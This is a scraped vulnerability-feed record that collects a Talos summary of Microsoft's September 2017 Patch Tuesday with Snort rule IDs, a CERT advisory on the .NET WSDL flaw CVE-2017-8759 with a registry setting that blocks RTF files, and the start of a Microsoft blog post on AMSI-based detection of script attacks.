href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8699\">CVE-2017-8699</a> - Windows Shell Remote Code Execution Vulnerability</li></ul><br /><br />The following briefly describes these vulnerabilities.<br /><br /><h3 id=\"h.yx03slsn57ac\">CVE-2017-8759 - .NET Framework Remote Code Execution Vulnerability</h3><br />A vulnerability has been identified in the Microsoft .NET Framework that could allow an attacker to execute arbitrary code on an affected device. This vulnerability manifests due to improperly handling untrusted input. Successful exploitation could result in an attacker being able to execute arbitrary code in the context of the current user. A user who opens a malicious document or application could be exploited and compromised via this vulnerability. <br /><br /><h3 id=\"h.uzavzney52sl\">CVE-2017-9417 - Broadcom BCM43xx Remote Code Execution Vulnerability</h3><br />A vulnerability has been identified in the Broadcom chipsets used in HoloLens that could allow an attacker to execute arbitrary code on an affected device. This vulnerability manifests due to improper handling of Wi-fi packets. Successful exploitation of this vulnerability could result in an attacker being able to take full control of the device with administrator privileges.<br /><br /><h3 id=\"h.q0sownl8t7qr\">CVE-2017-8746 - Device Guard Security Feature Bypass Vulnerability</h3><br />A vulnerability had been identified in Device Guard that could allow an attacker bypass a security control and inject malicious code into a Windows Powershell session. This vulnerability manifests as a flaw in how the Device Guard Code Integrity policy is implemented. An attacker who has access to a local machine could inject malicious into a script that is trusted by the Code Integrity policy. As a result, the injected code could run with the same trust level as the script, bypassing the Code Integrity policy control. <br /><br /><h3 id=\"h.ll3quw96ab85\">CVE-2017-8695 - Graphics Component Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified in Windows Uniscribe that could allow an attacker to obtain important system information. This information could then be used to further compromise a user's system via another vulnerability. Exploitation of this vulnerability could be achieved if a user opens a specially crafted document or visited a malicious web page that is designed to exploit this vulnerability.<br /><br /><h3 id=\"h.2bzhnugg695o\">CVE-2017-8704 - Hyper-V Denial of Service Vulnerability</h3><br />A denial of service vulnerability has been identified in Microsoft Hyper-V that could cause the host machine to crash. This vulnerability manifests due to the host server improperly validating input from a privileged user within a guest operating system. An attacker who has privileged access in a guest operating system on the affected host could execute a specially crafted application could trigger this vulnerability. <br /><br /><h3 id=\"h.r4ggol7u66a4\">Multiple CVEs - Hyper-V Information Disclosure Vulnerability</h3><br />Multiple information disclosure vulnerabilities have been identified in Windows Hyper-V that could allow an attacker to access sensitive information on the Hyper-V host operating system. These vulnerabilities manifest due to Hyper-V improperly validating input from an authenticated user inside a guest operating system. An attacker who has access to a guest VM and executes a specially crafted application within the guest VM could exploit this vulnerability and obtain information on the Hyper-V host.<br /><br />The following is a list of CVEs that reflect these vulnerabilities:<br /><ul><li>CVE-2017-8706</li><li>CVE-2017-8707</li><li>CVE-2017-8711</li><li>CVE-2017-8712</li><li>CVE-2017-8713</li></ul><h3 id=\"h.go05wxr3gp4u\">CVE-2017-8733 - Internet Explorer Spoofing Vulnerability</h3><br />A spoofing vulnerability in Internet Explorer has been identified that could allow an attacker to trick the user into believing they were visiting a legitimate web site. This vulnerability manifests due to Internet Explorer incorrectly handling specific HTML content. A user who navigates to a specially crafted web page under the control of the attacker could be exploited. As a result, this malicious website could then be used to serve spoofed content to the user or to serve as part of a exploit chain designed to compromise the affected host.<br /><br /><h3 id=\"h.34qo8abuqnpm\">CVE-2017-8628 - Microsoft Bluetooth Driver Spoofing Vulnerability</h3><br />A spoofing vulnerability has been identified in Microsoft's implementation of the Bluetooth stack and has been disclosed as part of \"BlueBorne\" series of vulnerabilities. This vulnerability could allow an attacker to perform a man-in-the-middle attack and force a user's device to \"unknowingly route traffic through the attacker's computer.\" For this exploit to be possible, an attacker would need to be within physical proximity to the targeted device and the targeted device would need to have Bluetooth enabled. Note that if both of these conditions are satisfied, an attacker could \"initiate a Bluetooth connection to the target computer without the user's knowledge.\"<br /><br /><h3 id=\"h.ln4j5mfzpuxf\">CVE-2017-8736 - Microsoft Browser Information Disclosure Vulnerability</h3><br />A vulnerability in Microsoft Edge and Internet Explorer has been identified that could allow an attacker to obtain information regarding the user's current session. This vulnerability manifests due to the browser improperly verifying parent domains in certain functionality. An attacker who socially engineers a user to visiting a specially crafted web page could exploit this flaw and obtain information that is specific to the parent domain. <br /><br /><h3 id=\"h.oviarhz23nwn\">CVE-2017-8597, CVE-2017-8648 - \ufeffMicrosoft Edge Information Disclosure Vulnerability</h3><br />Multiple vulnerabilities in Microsoft Edge have been identified that could allow an attacker to discover sensitive information regarding the targeted system. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of these vulnerabilities could given an attacker the necessary information to further exploit additional vulnerabilities on the system.<br /><br /><h3 id=\"h.191qetibk7vs\">CVE-2017-8643 - \ufeffMicrosoft Edge Information Disclosure Vulnerability</h3><br />An vulnerability in Microsoft Edge has been identified that could permit the disclosure of potentially sensitive information. This vulnerability manifests due to Microsoft Edge improperly handling clipboard events. Exploitation of this vulnerability is achievable if an attacker socially engineers a user to open a specially crafted web page that exploits this flaw. As long has this web page remains open, an attacker would be able to able to gain knowledge of clipboard activities.<br /><br /><h3 id=\"h.pwpku8fvq7t4\">CVE-2017-8754 - Microsoft Edge Security Feature Bypass Vulnerability</h3><br />A vulnerability in Microsoft Edge has been identified that could allow an attacker to bypass the Content Security Policy (CSP) feature. This vulnerability manifests due to improperly validating certain specially crafted documents. Successful exploitation could allow an attacker to redirect users to a malicious web page. Users who visit a specially crafted web page under the control of the attacker could be exploited. Alternatively, users who visit a compromised web page or who get served a malicious advertisement an attacker has injected into an advertising network could be exploited.<br /><br /><h3 id=\"h.bogzmmli42pp\">CVE-2017-8724 - Microsoft Edge Spoofing Vulnerability</h3><br />A vulnerability in Edge has been identified that could allow an attacker to spoof content on a targeted host. This vulnerability manifests due to improper parsing of HTTP content. Successful exploitation of this vulnerability would result in the user being redirected to a web site of the attacker's choosing. This web site could then spoof content or serve as part of an exploit chain whereby the user could be exploited via another vulnerability. Scenarios where a user could be attacked include email or instant message vectors where the user clicks on a malicious link, or the user navigates to a specially crafted web page under the control of the attacker.<br /><br /><h3 id=\"h.g6dm6snlerd4\">CVE-2017-8758 - Microsoft Exchange Cross-Site Scripting Vulnerability</h3><br />A cross-site scripting vulnerability in Microsoft Exchange has been identified that could allow an attacker to perform a content/script injection attack. This vulnerability manifests due to Exchange failing to properly handle web requests. An attacker who sends an intended victim a specially crafted email containing a malicious link could exploit this vulnerability and potentially trick the user into disclosing sensitive information.<br /><br /><h3 id=\"h.pg5opjwskjeq\">CVE-2017-11761 - Microsoft Exchange Information Disclosure Vulnerability</h3><br />A vulnerability in Microsoft Exchange has been identified that could allow an attacker to obtain information regarding the affected server's local network. This vulnerability manifests as an information disclosure flaw due to improper input sanitization. An attacker who includes specially crafted tags in a Calendar-related message and sends this to an affected Exchange server could exploit this flaw and enumerate internal hosts assigned an RFC 1918 IP address. This information could then be used as part of a larger attack.<br /><br /><h3 id=\"h.viucs2kai67d\">Multiple CVEs - Microsoft Office Memory Corruption Vulnerability</h3><br />Multiple vulnerabilities have been identified affecting Microsoft Office that could allow an attacker to execute arbitrary code on an affected system. These vulnerabilities manifest due to Office improperly handling objects in memory. A users who opens a maliciously crafted Office document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Office document. <br /><br />The following is a list of CVEs that reflect these vulnerabilities:<br /><ul><li>CVE-2017-8630</li><li>CVE-2017-8631</li><li>CVE-2017-8632</li><li>CVE-2017-8744</li></ul><h3 id=\"h.nuqj6pjdzqbu\">CVE-2017-8725 - Microsoft Office Publisher Remote Code Execution</h3><br />A vulnerability has been identified affecting Microsoft Office Publisher that could allow an attacker to execute arbitrary code on an affected system. This vulnerability manifests due to Publisher improperly handling objects in memory. A users who opens a maliciously crafted Publisher document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Publisher document. <br /><br /><h3 id=\"h.esin5ce3nqec\">CVE-2017-8567 - Microsoft Office Remote Code Execution</h3><br />A vulnerability has been identified affecting Microsoft Office that could allow an attacker to execute arbitrary code on an affected system. This vulnerability manifests due to Office improperly handling objects in memory. A user who opens a maliciously crafted document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Office document. Note that Preview Pane is not an attack vector for this vulnerability.<br /><br /><h3 id=\"h.ospgiqaad31r\">CVE-2017-8745, CVE-2017-8629 - Microsoft SharePoint XSS Vulnerability</h3><br />Two vulnerabilities in Microsoft Sharepoint have been identified that could could allow an attacker to execute a cross-site scripting (XSS) attack. These vulnerabilities manifest due to Sharepoint Server improperly sanitizing specific web requests from a user. Successful exploitation of these flaws could allow an attacker to execute script in the context of the current user, read content that the attacker would not have permission to otherwise view, or execute actions on behalf of the affected user.<br /><br /><h3 id=\"h.635w9ipli4p\">CVE-2017-8742, CVE-2017-8743 - PowerPoint Remote Code Execution Vulnerability</h3><br />Two vulnerabilities have been identified affecting Microsoft Office Powerpoint that could allow an attacker to execute arbitrary code on an affected system. These vulnerabilities manifest due to Powerpoint improperly handling objects in memory. A user who opens a maliciously crafted Powerpoint document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Powerpoint document. <br /><br /><h3 id=\"h.o485gj9i5m2w\">CVE-2017-8714 - Remote Desktop Virtual Host Remote Code Execution Vulnerability</h3><br />A vulnerability has been identified in the VM Host Agent Service of Remote Desktop Virtual Host that could allow an attacker to execute arbitrary code on an affected host. This vulnerability manifests due to improperly validating input from an authenticated user within a guest operating system. Exploitation of this flaw is achievable if an attacker issues a \"specially crafted certificate\" within a guest operating system, causing the \"VM host agent service on the host operating system to execute arbitrary code.\" Microsoft notes that the Remote Desktop Virtual Host role is not enabled by default.<br /><br /><h3 id=\"h.ky3d7sjix04t\">CVE-2017-8739 - Scripting Engine Information Disclosure Vulnerability</h3><br />A vulnerability in Microsoft Edge has been identified that could disclose sensitive information to an attacker. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining information that could then be used to further exploit the system. Users who visit a specially crafted web page under the control of the attacker could be exploited.<br /><br /><h3 id=\"h.z9wdxzsfio38\">CVE-2017-8692 - Uniscribe Remote Code Execution Vulnerability</h3><br />An arbitrary code execution vulnerability has been identified in Windows Uniscribe that could allow an attacker to execute code in the context of the current user. This vulnerability manifests due to Uniscribe improperly handling objects in memory. Exploitation of this vulnerability could be achieved if a user navigates to a malicious web page or opens a malicious file designed to exploit this vulnerability. <br /><br /><h3 id=\"h.t7doth5n2cw\">CVE-2017-8593 - Win32k Elevation of Privilege Vulnerability</h3><br />A vulnerability in Windows Kernel Mode Drivers has been identified that could allow a privilege escalation attack to occur. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability could result in an attacker being able to execute arbitrary code in kernel mode. An attacker who executes a specially crafted executable could exploit this vulnerability and as a result, gain full control of the affected system.<br /><br /><h3 id=\"h.ta4wavxlagpn\">CVE-2017-8720 - Win32k Elevation of Privilege Vulnerability</h3><br />A vulnerability in the Win32k component in Windows has been identified that could allow a privilege escalation attack to occur. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system. Users who run a specially crafted executable that exploits this vulnerability could leverage this vulnerability to perform actions as an administrator on the affected system.<br /><br /><h3 id=\"h.kkm2sbbbbjiq\">CVE-2017-8683 - Win32k Graphics Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified in the Windows Graphics Component that could allow an attacker to gain information about the host. This vulnerability manifests due to the Graphics Component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.<br /><br /><h3 id=\"h.fi4oouptx2sl\">CVE-2017-8678 - Win32k Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information about the host. This vulnerability manifests due to the kernel improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.<br /><br /><h3 id=\"h.jmbol5pwp86e\">Multiple CVEs - Win32k Information Disclosure Vulnerability</h3><br />Multiple information disclosure vulnerabilities have been identified in the Windows Graphics Device Interface+ (GDI+) component that could allow an attacker to gain information about the host. This vulnerability manifests due to the GDI+ component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.<br /><br />The following is a list of CVEs that reflect these vulnerabilities:<br /><ul><li>CVE-2017-8677</li><li>CVE-2017-8680</li><li>CVE-2017-8681</li></ul><h3 id=\"h.ck0pehdfhuu3\">CVE-2017-8687 - Win32k Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information which could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. This vulnerability manifests due to the kernel improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and obtain the \"memory address of a kernel object,\" allowing an attacker to leverage the information to further compromise the host.<br /><br /><h3 id=\"h.4erxlgg1wp8\">CVE-2017-8702 - Windows Elevation of Privilege Vulnerability</h3><br />A vulnerability in the Windows Error Reporting (WER) has been identified that could allow a privilege escalation attack to occur. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system.<br /><br /><h3 id=\"h.8xq934iw79wv\">Multiple CVEs - Windows GDI+ Information Disclosure Vulnerability</h3><br />Multiple information disclosure vulnerabilities have been identified in the Windows Graphics Device Interface+ (GDI+) that could allow an attacker to obtain potentially sensitive information about the affected host. These vulnerabilities manifest due to the Windows GDI+ component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.<br /><br />The following is a list of CVEs that reflect these vulnerabilities:<br /><ul><li>CVE-2017-8684</li><li>CVE-2017-8685</li><li>CVE-2017-8688</li></ul><h3 id=\"h.j57wphkiyqt8\">CVE-2017-8710 - Windows Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability in the Windows System Information Console has been identified that could allow an attacker to read arbitrary files on an affected system. This vulnerability manifests due to improper parsing of XML input which contains a reference to an external entity. An attacker who creates specially crafted file containing XML content and either opens the file or socially engineers an user to open the file on an affected system could exploit this vulnerability. <br /><br /><h3 id=\"h.7b1xywt7n53p\">Multiple CVEs - Windows Kernel Information Disclosure Vulnerability</h3><br />Multiple information disclosure vulnerabilities have been identified in the Windows kernel that could allow an attacker gain information about the host. These vulnerabilities manifest due to the kernel improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit these vulnerabilities and leverage the information to further compromise the host.<br /><br />The following is a list of CVEs that reflect these vulnerabilities:<br /><ul><li>CVE-2017-8679</li><li>CVE-2017-8709</li><li>CVE-2017-8719</li></ul><h3 id=\"h.cbhbkylvrzxe\">CVE-2017-8708 - Windows Kernel Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information which could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. This vulnerability manifests due to the kernel failing to properly initialize a memory address. An attacker who runs a specially crafted executable could exploit this vulnerability and obtain the \"base address of the kernel driver from a compromised process,\" allowing an attacker to leverage the information to further compromise the host.<br /><br /><h3 id=\"h.xp1vybmtwc6q\">CVE-2017-8716 - Windows Security Feature Bypass Vulnerability</h3><br />A vulnerability has been identified in Windows Control Flow Guard that could allow an attacker bypass its intended function. This vulnerability manifests due to the Control Flow Guard mishandling objects in memory. An attacker who runs a specially crafted executable on an affected host could exploit this vulnerability.<br /><br /><h3 id=\"h.5dcwsx39r8a8\">CVE-2017-8699 - Windows Shell Remote Code Execution Vulnerability</h3><br />An arbitrary code execution vulnerability has been identified in the Windows Shell that could allow an attacker to execute code in the context of the current user. This vulnerability manifests as a result of Window Shell improperly validating file copy destinations. An attacker who opens a specially crafted file could exploit this vulnerability. Scenarios where end-user could be compromised include email-based attacks, where an attacker send the victim a malicious attachment that the user opens, or a web-based attack where the user downloads and opens a malicious file.<br /><br /><h2 id=\"h.b311wwj7cqyf\">Vulnerabilities Rated Moderate</h2><br />The following vulnerabilities are rated \"moderate\" by Microsoft:<br /><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8723\">CVE-2017-8723</a> - Microsoft Edge Security Feature Bypass Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8735\">CVE-2017-8735</a> - Internet Explorer Memory Corruption Vulnerability</li></ul>The following briefly describes these vulnerabilities.<br /><br /><h3 id=\"h.6ja1j3o46v6h\">CVE-2017-8723 - Microsoft Edge Security Feature Bypass Vulnerability</h3><br />A vulnerability in Microsoft Edge has been identified that could allow an attacker to bypass the Content Security Policy (CSP) feature. This vulnerability manifests due to improperly validating certain specially crafted documents. Successful exploitation could allow an attacker to redirect users to a malicious web page. Users who visit a specially crafted web page under the control of the attacker could be exploited. Alternatively, users who visit a compromised web page or who get served a malicious advertisement an attacker has injected into an advertising network could be exploited.<br /><br /><h3 id=\"h.iughuzwb6gbk\">CVE-2017-8735 - Microsoft Edge Spoofing Vulnerability</h3><br />A vulnerability in Edge has been identified that could allow an attacker to spoof content on a targeted host. This vulnerability manifests due to improper parsing of HTTP content. Successful exploitation of this vulnerability would result in the user being redirected to a web site of the attacker's choosing. This web site could then spoof content or serve as part of an exploit chain whereby the user could be exploited via another vulnerability. Scenarios where a user could be attacked include email or instant message vectors where the user clicks on a malicious link, or if the user navigates to a specially crafted web page under the control of the attacker.<br /><br /><h2 id=\"h.oka11wrn5dcu\">Coverage</h2><br />In response to these vulnerability disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=\"https://snort.org/products\">Snort.org</a>.<br /><br /><b>Snort Rules:</b><br /><ul><li>42285-42286</li><li>42311-42312</li><li>42749-42750</li><li>44331-44336</li><li>44338-44343</li><li>44349-44350</li><li>44353-44357</li></ul><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=Gck7dmdECXk:Kp7QhKuWcqI:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/Gck7dmdECXk\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-09-12T22:44:10", "published": "2017-09-12T15:41:00", "id": "TALOSBLOG:36D857BF71D07CAE276BCB26AC34D574", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/Gck7dmdECXk/ms-tuesday.html", "title": "Microsoft Patch Tuesday - September 2017", "type": "talosblog", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:41:35", "bulletinFamily": "info", "cvelist": ["CVE-2017-8759"], "description": "### Overview \n\nThe Microsoft .NET framework fails to properly parse WSDL content, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nThe PrintClientProxy method in the WSDL-parsing component of the Microsoft .NET framework fails to properly handle linefeed characters. If an attacker can trigger the .NET framework to trigger a specially-crafted WSDL file, this can result in arbitrary code execution.\n\nThis vulnerability is currently being exploited in the wild, by way of an RTF file with an embedded Soap Moniker object that triggers a remote WSDL file to be retrieved and parsed. Other attack vectors may be possible. \n \n--- \n \n### Impact \n\nBy causing the .NET framework to parse a specially-crafted WSDL file with the SOAP Moniker, an unauthenticated remote attacker may be able to execute arbitrary code on a vulnerable system. Current exploits achieve this by convincing a user to open a RTF document. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThis issue is addressed in [CVE-2017-8759 | .NET Framework Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) \n \n--- \n \n**Enable Protected View for RTF documents in Microsoft Word** \n \nExploits in the wild utilize RTF documents. These public exploits are blocked if Protected Mode is enabled for RTF documents in Microsoft Word. Refer to[ File Block Settings in the Microsoft Office Trust Center](<https://support.office.com/en-us/article/What-is-File-Block-10d0e0ab-fecf-4605-befd-1e6563e7686d>). For example, the following registry values can be used to block the opening of RTF documents in Word 2016: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\FileBlock]` \n`\"RtfFiles\"=dword:00000002` \n \nFor other versions of Office, the path above will need to be modified to match the version number associated with the installed version of Office. \n \n--- \n \n### Vendor Information\n\n101048\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation Affected\n\nUpdated: September 13, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 6.5 | E:H/RL:OF/RC:C \nEnvironmental | 6.5 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>\n\n### Acknowledgements\n\nThis issue was discovered by Genwei Jiang and Dhanesh Kizhakkinan of FireEye, Inc.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2017-8759](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-8759>) \n---|--- \n**Date Public:** | 2017-09-12 \n**Date First Published:** | 2017-09-13 \n**Date Last Updated: ** | 2017-09-16 12:18 UTC \n**Document Revision: ** | 26 \n", "modified": "2017-09-16T12:18:00", "published": "2017-09-13T00:00:00", "id": "VU:101048", "href": "https://www.kb.cert.org/vuls/id/101048", "type": "cert", "title": "Microsoft .NET framework SOAP Moniker PrintClientProxy remote code execution vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2018-01-16T22:10:44", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8759"], "description": "[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/1-amsi-ml-banner-small.jpg>)[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/1-amsi-ml-banner-small.jpg>)\n\nScripts are becoming the weapon of choice of sophisticated activity groups responsible for targeted attacks as well as malware authors who indiscriminately deploy commodity threats.\n\nScripting engines such as JavaScript, VBScript, and PowerShell offer tremendous benefits to attackers. They run through legitimate processes and are perfect tools for living off the landstaying away from the disk and using common tools to [run code directly in memory](<https://blogs.technet.microsoft.com/mmpc/tag/in-memory-attacks/>). Often part of the operating system, scripting engines can evaluate and execute content from the internet on-the-fly. Furthermore, integration with popular apps make them effective vehicles for delivering malicious implants through social engineering as evidenced by the increasing use of [scripts in spam campaigns](<https://blogs.technet.microsoft.com/mmpc/2017/02/02/improved-scripts-in-lnk-files-now-deliver-kovter-in-addition-to-locky/>).\n\nMalicious scripts are not only used as delivery mechanisms. We see them in various stages of the kill chain, including during lateral movement and while establishing persistence. During these latter stages, the scripting engine of choice is clearly PowerShellthe _de facto_ scripting standard for administrative tasks on Windowswith the ability to invoke system APIs and access a variety of system classes and objects.\n\nWhile the availability of powerful scripting engines makes scripts convenient tools, the dynamic nature of scripts allows attackers to easily evade analysis and detection by antimalware and similar endpoint protection products. Scripts are easily obfuscated and can be loaded on-demand from a remote site or a key in the registry, posing detection challenges that are far from trivial.\n\nWindows 10 provides optics into script behavior through [Antimalware Scan Interface (AMSI)](<https://blogs.technet.microsoft.com/mmpc/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/>), a generic, open interface that enables [Windows Defender Antivirus](<https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-antivirus/windows-defender-antivirus-in-windows-10?ocid=cx-blog-mmpc>) to look at script contents the same way script interpreters doin a form that is both unencrypted and unobfuscated. In [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>), with knowledge from years analyzing script-based malware, weve added deep behavioral instrumentation to the Windows script interpreter itself, enabling it to capture system interactions originating from scripts. AMSI makes this detailed interaction information available to registered AMSI providers, such as Windows Defender Antivirus, enabling these providers to perform further inspection and vetting of runtime script execution content.\n\nThis unparalleled visibility into script behavior is capitalized further through other Windows 10 Fall Creators Update enhancements in both Windows Defender Antivirus and Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc?ocid=cx-blog-mmpc>)). Both solutions make use of powerful machine learning algorithms that process the improved optics, with Windows Defender Antivirus delivering enhanced blocking of malicious scripts pre-breach and Windows Defender ATP providing effective behavior-based alerting for malicious post-breach script activity.\n\nIn this blog, we explore how Windows Defender ATP, in particular, makes use of AMSI inspection data to surface complex and evasive script-based attacks. We look at advanced attacks perpetrated by the highly skilled KRYPTON activity group and explore how commodity malware like Kovter abuses PowerShell to leave little to no trace of malicious activity on disk. From there, we look at how Windows Defender ATP [machine learning systems](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) make use of enhanced insight about script characteristics and behaviors to deliver vastly improved detection capabilities.\n\n## KRYPTON: Highlighting the resilience of script-based attacks\n\nTraditional approaches for detecting potential breaches are quite file-centric. Incident responders often triage autostart entries, sorting out suspicious files by prevalence or unusual name-folder combinations. With modern attacks moving closer towards being completely fileless, it is crucial to have additional sensors at relevant choke points.\n\nApart from not having files on disk, modern script-based attacks often store encrypted malicious content separately from the decryption key. In addition, the final key often undergoes multiple processes before it is used to decode the actual payload, making it is impossible to make a determination based on a single file without tracking the actual invocation of the script. Even a perfect script emulator would fail this task.\n\nFor example, the activity group KRYPTON has been observed hijacking or creating scheduled tasksthey often target system tasks found in exclusion lists of popular forensic tools like [Autoruns for Windows](<https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns>). KRYPTON stores the unique decryption key within the parameters of the scheduled task, leaving the actual payload content encrypted.\n\nTo illustrate KRYPTON attacks, we look at a tainted Microsoft Word document identified by [John Lambert](<https://twitter.com/JohnLaTwC/status/915590893155098629>) and the [Office 365 Advanced Threat Protection](<https://products.office.com/en-au/exchange/online-email-threat-protection>) team.[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/2-ams-ml-krypton-lure.png>)\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/2b-amsi-ml-krypton-lure.png>)\n\n_Figure 1. KRYPTON lure document_\n\nTo live off the land, KRYPTON doesnt drop or carry over any traditional malicious binaries that typically trigger antimalware alerts. Instead, the lure document contains macros and uses the Windows Scripting Host (_wscript.exe_) to execute a JavaScript payload. This script payload executes only with the right RC4 decryption key, which is, as expected, stored as an argument in a scheduled task. Because it can only be triggered with the correct key introduced in the right order, the script payload is resilient against automated sandbox detonations and even manual inspection.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/3b-amsi-ml-krypton-chain.jpg>)\n\n_Figure _2_. KRYPTON script execution chain through wscript.exe_\n\n## Exposing actual script behavior with AMSI\n\nAMSI overcomes KRYPTONs evasion mechanisms by capturing JavaScript API calls after they have been decrypted and ready to be executed by the script interpreter. The screenshot below shows part of the exposed content from the KRYPTON attack as captured by AMSI.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/4-amsi-ml-krypton-script-captured.png>)\n\n_Figure 3. Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis_\n\nBy checking the captured script behavior against indicators of attack (IoAs) built up by human experts as well as machine learning algorithms, Windows Defender ATP effortlessly flags the KRYPTON scripts as malicious. At the same time, Windows Defender ATP provides meaningful contextual information, including how the script is triggered by a malicious Word document.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/5-amsi-ml-krypton-script-alert.png>)\n\n_Figure 4. Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI_\n\n## PowerShell use by Kovter and other commodity malware\n\nNot only advanced activity groups like KRYPTON are shifting from binary executables to evasive scripts. In the commodity space, [Kovter malware](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Kovter>) uses several processes to eventually execute its malicious payload. This payload resides in a PowerShell script decoded by a JavaScript (executed by _wscript.exe_) and passed to _powershell.exe_ as an environment variable.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/6-amsi-ml-kovter-alert.png>)\n\n_Figure 5. Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload_\n\nBy looking at the [PowerShell payload content captured by AMSI](<https://blogs.technet.microsoft.com/poshchap/2015/10/16/security-focus-defending-powershell-with-the-anti-malware-scan-interface-amsi/>), experienced analysts can easily spot similarities to [PowerSploit](<https://github.com/PowerShellMafia/PowerSploit>), a publicly available set of penetration testing modules. While such attack techniques involve file-based components, they remain extremely hard to detect using traditional methods because malicious activities occur only in memory. Such 